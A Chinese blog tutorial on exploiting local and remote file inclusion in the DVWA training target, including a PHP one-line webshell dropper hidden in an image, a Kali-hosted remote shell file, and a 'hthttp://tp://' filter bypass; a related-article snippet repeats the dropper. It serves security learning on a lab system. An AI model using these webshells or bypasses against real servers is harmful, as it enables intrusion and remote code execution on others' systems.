OWASP文件包含漏洞总结

最新推荐文章于 2023-02-04 21:15:33 发布
最新推荐文章于 2023-02-04 21:15:33 发布
阅读量456 收藏 3
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51333478/article/details/116430222
版权

分为为本地文件包含和远程文件包含。在开发的PHP源码中会有使用多次的内容(类似c语言中的头文件和函数),所有的函数都要写在一个文件中,在使用时直接调用,即为包含。又因为在引入这些时,没有进行合理的校验,可能会引用含有恶意内容的文件。大致原理如下图。
1.本地文件包含(LFI)
low和medium时相同。
在调用本机的文件时,可能里面含有木马。
在OWASP靶机中,向靶机中先上传一个含有php一句话木马隐写的图片(制作隐写图片使用工具edjpgcom.exe,将要隐写图片托到工具上,在弹出的窗口中写木马),这时的本机中就含有了恶意的图片文件,上传图片后将上传成功的部分网址复制后进入文件包含漏洞页面访问(复制的内容加在page=的后面)。在这里插入图片描述
访问后出现乱码的情况即上传成功,如同在这里插入图片描述 上传的图片中包含的木马为<?fputs(fopen("shellbaohan.php","w"),"<?php eval($_POST['caidao']);?>")?>
意思为创建一个文件名为shellbaohan.php,并且写入<?php eval($_POST['pass']);?>的木马。这样就可以用菜刀连接。
2.远程文件包含(RFI)
low
调用的文件为其他网址中的内容,即page=后面为一个网址。
首先需要配置一个服务器,我将我的kali作为服务器,使用命令systemctl start apache2开启服务器,使用命令systemctl status apache2查看服务器的状态。
在这里插入图片描述
使用命令ip a查看kali的ip地址,可以在浏览器中输入该ip查看(仅是一个测试网页).在这里插入图片描述
在kali机中,使用命令vim /var/www/html/yuan.txt写一句话木马,内容如下图在这里插入图片描述
shell.php和caidao可以随便修改,保存时可以直接使用:wq!强制保存并且退出,但是如果现实权限不够时使用:w !sudo tee % 保存。这时kali作为远程的服务器,其中也含有了恶意木马文件。使用远程地址可看文件内容。在这里插入图片描述
在文件包含漏洞的page=后面加上远程包含的文件地址访问,如下图在这里插入图片描述
在OWASP靶机中进行如下操作在这里插入图片描述
上图中,cd后跟要打开的文件位置, ls打开该目录下所有文件,more shell. php打开more后面文件查看。也可以使用菜刀连接,如下图在这里插入图片描述
该地址为包含漏洞页面?前面的部分。
meduim
其他操作与low相同,但是看源码中会讲http://和https://改为空,所以需要使用hthttp://tp://的方法使其删除http://后重新拼接出http://进行远程文件包含。
high
在high中查看源代码如下
在这里插入图片描述
直接限制文件包含的名字,相当于直接将代码写死,需要注入木马。

碳水爱好者!
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场,集成了owasp top 10漏洞
03-28
这个靶场集成了OWASP(Open Web Application Security Project)的Top 10漏洞,这些是网络应用中最常见且最具危害性的安全问题。通过在DVWA中实践,用户能够深入理解漏洞的原理,学习如何识别它们,以及如何利用这些...
我的web渗透学习心得(一)
热门推荐
whiteinblack
05-01 1万+
        好久没写博客了,上次写博客还是在上学期.而且以前写博客都是写写一周做了些什么.这次分享一些自己学web渗透的一些心得吧(仅作个人心得,谨慎参照,有大佬路过还望指点一下~).此前一直在学Java web.这次趁着五一假期好好钻研了下web渗透.其实我一直觉得每个学计算机的人都有黑客梦,炫酷吊炸天啊......其实很早我就想学web安全.上学期在工作室学了一个学期的前端打了下基础.看了...
OWASP-文件上传漏洞简述(低中高)
qq_55803921的博客
11-04 1014
OWASP-文件上传漏洞简述:OWASP-文件上传漏洞(低级):OWASP-文件上传漏洞(中级):OWASP-文件上传漏洞(高级):webshell文件包含: 注:仅作学习使用 OWASP-文件上传漏洞(低级): 首先上传一个jgp图片,测试它上传成功的反应: 发现上传成功是这样的: 然后试试上传其他类型的文件,此处是一个html的文件,发现可以上传成功: 再试试上传一句话木马可不可以: 上传成功哈: 访问一下自己的文件(靶场不同于网站,其他网站得自己找路径): 虽然没看显示东西,但是东西就在这里
Web渗透_扫描工具OWASP_ZAP
分享学习网络的点点滴滴
07-18 1551
OWASP_ZAPWEBApplicaiton系统渗透测试和漏洞挖掘工具开源免费跨平台简单易用截断代理主动、被动扫描Fuzzy、暴力破解APIhttp//zap/需要浏览器开启代理。
了解owasp zap扫描器
贝隆的博客
02-04 803
owasp zap扫描器
OWASP Security Shepherd靶场攻略-Lessons篇
weixin_42484187的博客
07-13 3798
OWASP Security Shepherd靶场攻略-Lessons篇 1.Broken Session Management(会话管理): 题目要求:研究下面的函数,是否欺骗服务器认为已经完成了本课程,返回key。 测试步骤: 拦截请求,做如图所示更改,获得key 提交key值: 2.Cross Site Scripting(跨站脚本攻击): 题目要求: 实现跨站脚本,弹出xss弹窗。 测试步骤: 常规输入即可, 提交key值。 3.Failure to Restrict URL Access 题
OWASP_Scanner:一款扫描网站OWASP漏洞的软件
07-14
1. **源代码**:OWASP Scanner的PHP源代码,包含了实现各种漏洞检测的模块和脚本。 2. **文档**:可能包括用户指南、开发者文档或API参考,帮助用户理解和使用该工具。 3. **配置文件**:用于设置扫描参数,如扫描...
执行漏洞总结
08-24
2. 文件包含漏洞:允许攻击者通过指定文件路径来包含远程或本地的文件,如果该文件被解释为可执行代码,攻击者就能执行任意代码。 3. 服务器端请求伪造(SSRF):攻击者利用此漏洞,通过伪造内部服务器的请求,可以...
OWASP
03-26
开始时,这些文件包含易受攻击的代码。 经过一些测试,漏洞得到了修补。 如果需要,可以使用此文件进行实验。 使文件再次容易受到攻击非常容易。 链接,用于按类别进行学习: A10。 未经验证的重定向和转发 A9。 ...
Mutillidae II 实验指导书.rar
11-17
- 文件包含漏洞:允许攻击者将外部文件内容插入到应用程序中,可能导致代码执行或信息泄露。 - 会话管理问题:如会话固定、会话劫持和会话劫持,攻击者可以接管用户会话,进行非法操作。 4. 安全最佳实践: - ...
【渗透应急溯源经验篇】网络安全面试
大河之犬的博客
05-17 3027
5、我们发现一个攻击(如平台登录后的SQL注入)可以通过流量回溯装置抓取那个被登录用户的用户名和密码,登录平台后自己利用发现的payload进行尝试,看是否能注入成功。如果一个数据包非常大,几个G或者一个G,我们就考虑数据包是否进行了重传,然后查看数据包的重传数,打个比方就是刷新,如果短时间重传数非常多,就为机器操作,判定为攻击。SMB,SSH,MSSQL,MySQL等协议比较多,看包的大小,成功登陆的包很大。3、确定数据流,攻击的数据流我们是要看HTTP,TCP,还是ssh。
owaspzap使用(中文)
xiaozhao5212的博客
05-27 4243
​ 一、安装 下载地址:OWASP ZAP – Download Windows下载下来的是exe的,双击就可以了! Linuxg下载下来的不是.sh就是tar.gz,这个就更加简单了。 唯一需要注意的是: Windows和Linux版本需要运行Java 8或更高版本JDK, MacOS安装程序包括Java 8; 二、使用 1、初步使用ZAP 进程保留: 初次打开ZAP时,会看到以下对话框,询问是否要保持ZAP进程。 保存进程则可以让你的操作...
Owasp-zap学习介绍
永不垂头的博客
08-22 445
Owasp-zap学习介绍 Owasp-zap学习介绍 8080已启用 登录成功 release beta alpha 截断代理: 主动扫描漏洞: 设置好后,访问任何流量都会经过OWASP ZAP Zap主动扫描: 利用字典扫描爆破 配置相关,即可进行扫描。 后续操作请持续关注哦!!! 了解更多请关注下列公众号: ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ????
Web安全渗透OWASP-DVWA文件上传与文件包含漏洞
lx1315998513的博客
10-29 2277
配置环境 下载并启动OWASP Broken Web Apps VM v1.2(注意:网站IP地址由自己具体IP为准) Welcome to the OWASP Broken Web Apps VM !!! This VM has many serious security issues. We strongly recommend that you run it only on the...
利用Owasp Zap Proxy实现正对Web站点的扫描和漏洞发现功能
Brisbane的博客
10-23 3802
Owasp的功能与之前提过的Burp Pro Proxy相类,都具有流量代理、fuzz请求、抓取网页和自动扫描等功能,不同的是Owasp提供了更加简洁的操作界面,Burp Pro Proxy支持Burp扩展能够具有更强大的定制处理能力。 同metasploitable一样,Owasp Zap Proxy提供了一个存在漏洞的渗透测试演练工具OWASPBWA,我们可以通过这个虚拟机练习使用Owasp ...
OWASP-ZAP扫描器的使用
墨鱼菜鸡
11-15 365
目录 OWASP-ZAP 更新 代理 目录扫描 主动扫描(Active Scan) 扫描结果 生成报告 OWASP-ZAP OWASP Zed攻击代理(ZAP)是世界上最受欢迎的免费安全审计工具之一,由数百名国际志愿者积极维护。它可以帮助你在开发和测试应用程序时自动查找Web应用程序中...
基于owasp实现文件包含漏洞
M_Young的博客
12-05 395
文件包含渗透 <?fputs(fopen(‘‘shell.php’’, ‘‘w’’),‘<?php eval($_POST[pass]);?>’)?> 注:打开shell.php的文件,并写入<?php eval($_POST[pass]);?> 就在本地生成了一句话木马,然后就可以通过菜刀这样的工具连接木马。 本地文件包含LFI:(首先需要上传文件,才能修改=后面的文件) 192.168.40.108/dvwa/vulnerabilities/fi/index.php
OWASP zap在Win10电脑,响应报文乱码问题,最简单的使用
u014230794的博客
08-29 1329
OWASP zap初次使用配置,响应报文中文乱码,火狐浏览器无法启动问题
DVWA漏洞靶场-文件包含(File Inclusion)
08-02 524
基本知识: php中引发文件包含漏洞的通常是以下四个函数: include() include_once() require() require_once()    require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_...
后台管理系统文件包含漏洞测试方法描述
最新发布
05-17
1. 确认目标:首先需要确认目标系统是否存在文件包含漏洞,可以使用一些常见的工具,如Burp Suite、OWASP ZAP等对目标系统进行扫描,或者手工访问目标系统并尝试访问一些敏感文件。 2. 构造攻击:针对目标系统中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值